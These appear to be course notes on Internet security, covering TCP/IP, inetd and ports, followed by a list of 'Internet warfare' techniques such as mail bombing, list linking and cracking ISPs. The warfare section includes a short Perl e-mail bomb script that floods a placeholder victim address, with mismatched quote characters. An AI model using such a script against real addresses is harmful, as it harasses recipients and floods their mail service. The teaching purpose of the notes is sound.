2. Internet and Its Security Aspects

Why Is the Internet Insecure?

Lack of Education
The Internet's Design
- Internet is a heterogeneous networking of a tangled mesh of protocols.
- Security experts should protect them all, while crackers need to find one weak spot.
- Part of the problem is in the Internet's basic design: client/server model.
- the UNIX platform associated with the Internet's design: access control and privileges
Proprietarism
- ActiveX: security problem and early measure by Microsoft: digital signature

Related issue: security by obscurity
- Speak not and all will be well.
- Hide and perhaps they will not find you.
- The technology is complex. You are safe.
These principles have not only been proven faulty, but they also go against the original concepts of how security could evolve through discussion and open education.
The Jargon File defines:

The Trickling Down of Technology
Some major security sites for information and tools:
- Purdue University: http://www.cs.purdue.edu//coast/archive/
- Raptor Systems: http://www.raptor.com/library/library.html
- The Risks Forum: http://catless.ncl.ac.uk/Risks
- FIRST: http://www.first.org/
- DEFCON: http://www.defcon.org/

Human Nature
- Laziness
- Fear of publicity
- Curiosity

Side Bar

The Problems with PC-Based Operating Systems:
Anonymity on the Net: Anonymous Remailer and Pseudonymity Servers

Can the Internet Be Secure?

Yes. But, Internet security relies as much on public as private education. (???)

TCP/IP: The Basics

What Is TCP/IP?

What Platforms Support TCP/IP?
- Most platforms support TCP/IP.
- Most mainstream operating systems have native TCP/IP support: UNIX, Windows 95, Windows NT, OS/2
- Platforms that do not natively support TCP/IP can still implement it through the use of proprietary or third-party TCP/IP programs. Most of non-native, third-party TCP/IP implementations do not provide servers within their distributions.
How Does TCP/IP Work?
TCP/IP operates through the use of a protocol stack, broken into layers:

The Address Resolution Protocol: handles mapping of Internet addresses into physical addresses (Ethernet addresses).
1. When the ARP receives a recipient device's IP address, it searches the ARP cache for a match.
2. If it finds one, it returns the physical address; otherwise it broadcasts an ARP request to all devices on the local network.
3. If a device recognizes the IP address as belonging to it, the device sends a reply message containing its physical address back to the machine that generated the ARP request, which places the information into its ARP cache for future use. Then the ARP returns the physical address.
The Internet Control Message Protocol: handles error and control messages that are passed between two (or more) computers or hosts during the transfer process.
The Internet Protocol: provides packet delivery for all protocols within the TCP/IP suite.
The IP datagram:
Detailed IP Header:
The Transmission Control Protocol: reliable data transfer
The TCP system relies on a virtual circuit that is established between the requesting machine and its target. This circuit is opened via three-part handshake:

inetd: The Mother of All Daemons
- Daemons are programs that continuously listen for other processes (in this case, the process listened for is a connection request). These programs remain alive at all times, constantly listening for a particular event. When that event finally occurs, the daemon undertakes some action.
- inetd is a very special daemon; it listens for all the other daemons. When inetd receives a request, it evaluates the request, and activates the appropriate daemon.
- /etc/inetd.conf file is used to specify what services will be called by inetd. Such services might include FTP, Telnet, SMTP, TFTP, Finger, Systat, Netstat, etc.
The Ports
As each connection request is received, inetd starts an application server program. To facilitate this process, each application (FTP or Telnet, for example) is assigned a unique address. This address is called a port.
There are thousands of ports on the average Internet server. For purposes of convenience and efficiency, a standard framework has been developed for port assignment. These are commonly referred to as well-known ports:

TCP/IP Is the Internet

Internet Warfare

The Private Individual

The E-Mail Bomb: sending the same message to a targeted recipient over and over again.

Special Tools

UNIX scripts:

#!/bin/perl
$mailprog = `/usr/lib/sendmail';
$recipient = `victim@targeted_site.com';
$loop_cnt = 0;
while ($loop_cnt < 1000) {
    open (MAIL, "|$mailprog $recipient") || die "Can't open $mailprog!\n";
    print MAIL "You are very bad!";
    close(MAIL);
    sleep 3;
    $loop_cnt++;
}

List Linking: enrolling the target in many e-mail lists.
Posting offensive text in a public forum faking the victim's e-mail address.
Harassment via e-mail.
Killing IRC (Internet Relay Chat) Connection
Virus Infections and Trojan Horses
Cracking Personal Systems

The Public and Institutions/Corporations/Governments
- Canceling Usenet messages
- Cracking ISP (Internet Service Providers)
- A pirated software site housed in ISP's drives
- A cracker takes control of an ISP and uses it to attack another.
- Industrial and governmental espionage